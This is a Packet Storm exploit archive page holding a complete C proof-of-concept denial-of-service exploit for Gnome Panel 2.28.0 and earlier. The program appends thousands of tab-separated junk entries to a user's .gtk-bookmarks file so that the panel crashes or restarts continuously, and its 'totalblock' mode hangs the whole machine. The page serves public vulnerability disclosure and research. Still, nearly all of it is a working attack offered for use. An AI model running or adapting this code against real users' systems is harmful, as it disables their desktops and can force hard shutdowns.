what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Gnome Panel 2.28.0 Denial Of Service

Gnome Panel 2.28.0 Denial Of Service
Posted Jan 7, 2010
Authored by Pietro Oliva

Gnome Panel versions 2.28.0 and below denial of service proof of concept exploit.

tags | exploit, denial of service, proof of concept
SHA-256 | e29183e7a8b1eb5a52dcb852b6fcd168a4575c018ec59fb9bfc89dd06299d339

Gnome Panel 2.28.0 Denial Of Service

Change Mirror Download
# Exploit Title: Gnome panel <= 2.28.0 denial of service poc 0-day
# Date: 06/01/2009
# Author: Pietro Oliva
# Software Link:
# Version: 2.28.0
# Tested on: ubuntu 9.10
# CVE :
# Code :

/*********************************************************************************
* Gnome panel <= 2.28.0 denial of service poc 0-day *
* by Pietro Oliva <pietroliva@gmail.com> *
* *
* After executing this poc a backup file will be created *
* You can restore it by typing ./paneldos restore *
* Using option restart gnome-panel will restart continuously *
* Using option totalblock you will need to remove the battery *
* After execution click application in the panel, then go to places *
* and wait some seconds... *
* https://bugs.launchpad.net/ubuntu/+source/gnome-panel/+bug/503868 *
**********************************************************************************/



#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
FILE *f;
unsigned long i;
printf("%s","Gnome panel <= 2.28.0 denial of service by Pietro Oliva poc 0-day\n\n");
if(!(f=fopen(".gtk-bookmarks","r")))
{
printf("%s","file not found! make sure you are running\nthis file from your home directory\n");
return 1;
}
fclose(f);
if((argv[1]==NULL))
{
printf("%s","please specify an argument!\n");
printf("%s","usage: ./paneldos <option>\npossible options are:\trestart\t\ttotalblock\trestore\n");
return 1;
}
if(((strcmp(argv[1],"restart"))==0))
i=9999;
else if((strcmp(argv[1],"totalblock"))==0)
i=99999;
else if((strcmp(argv[1],"restore"))==0)
{
if(!(f=fopen(".backup","r")))
{
printf("%s","no backup found!\nmake sure you are running\nthis file from your home directory\n");
return 1;
}
fclose(f);
system("cp .backup .gtk-bookmarks");
printf("%s","succesfully restored!\n");
return 0;
}
else
{
printf("%s","usage: ./paneldos <option>\npossible options are:\trestart\t\ttotalblock\trestore\n");
return 1;
}
if(!(f=fopen(".backup","r")))
{
printf("%s","creating backup...\n");
system("cp .gtk-bookmarks .backup");
}
else
fclose(f);
f=fopen(".gtk-bookmarks","a");
printf("%s","starting...\n");
fwrite("file:///home ",1,13,f);
while(i>0)
{
fwrite("\ta",1,2,f);
i--;
}
fclose(f);
printf("%s","done! now click applications in panel,\nslide to places, wait and see the result! :D\n");
return 0;
}
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close